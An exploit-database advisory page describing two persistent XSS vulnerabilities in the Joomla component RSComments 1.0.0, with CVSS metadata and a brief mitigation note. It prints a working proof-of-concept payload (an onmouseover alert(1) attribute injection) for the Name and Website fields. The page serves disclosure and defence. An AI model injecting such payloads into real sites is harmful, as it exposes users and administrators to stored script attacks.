header-logo
Suggest Exploit
vendor:
RSComments
by:
jdc
5.5
CVSS
MEDIUM
Multiple XSS
79
CWE
Product Name: RSComments
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: PHP5, MySQL5
2010

Joomla Component RSComments 1.0.0 Multiple XSS Vulnerabilities

There are two persistent XSS vulnerabilities in the Joomla Component RSComments version 1.0.0. The first vulnerability is in the Name field and the second vulnerability is in the Website field. The exploit payload is "x"/style="position:absolute;top:0;left:0;width:999pc;height:999pc"/onmouseover="alert(1)//". The first vulnerability only executes in the backend, while the second vulnerability executes in both the frontend and backend.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize and validate user input before displaying it on the website. Additionally, restricting user input to specific characters or length can also help prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: Joomla Component RSComments 1.0.0 Multiple XSS
Vulnerabilities
# Date: 18 May 2010
# Author: jdc
# Software Link: http://www.rsjoomla.com
# Version: 1.0.0
# Tested on: PHP5, MySQL5

Name Field Persistent XSS
-------------------------

x"/style="position:absolute;top:0;left:0;width:999pc;height:999pc"/onmouseover="alert(1)//"

NOTE: ONLY executes in backend!

Website Field Persistent XSS
----------------------------

http://x"/style="position:absolute;top:0;left:0;width:999pc;height:999pc"/onmouseover="alert(1)//"

NOTE: also executes in backend!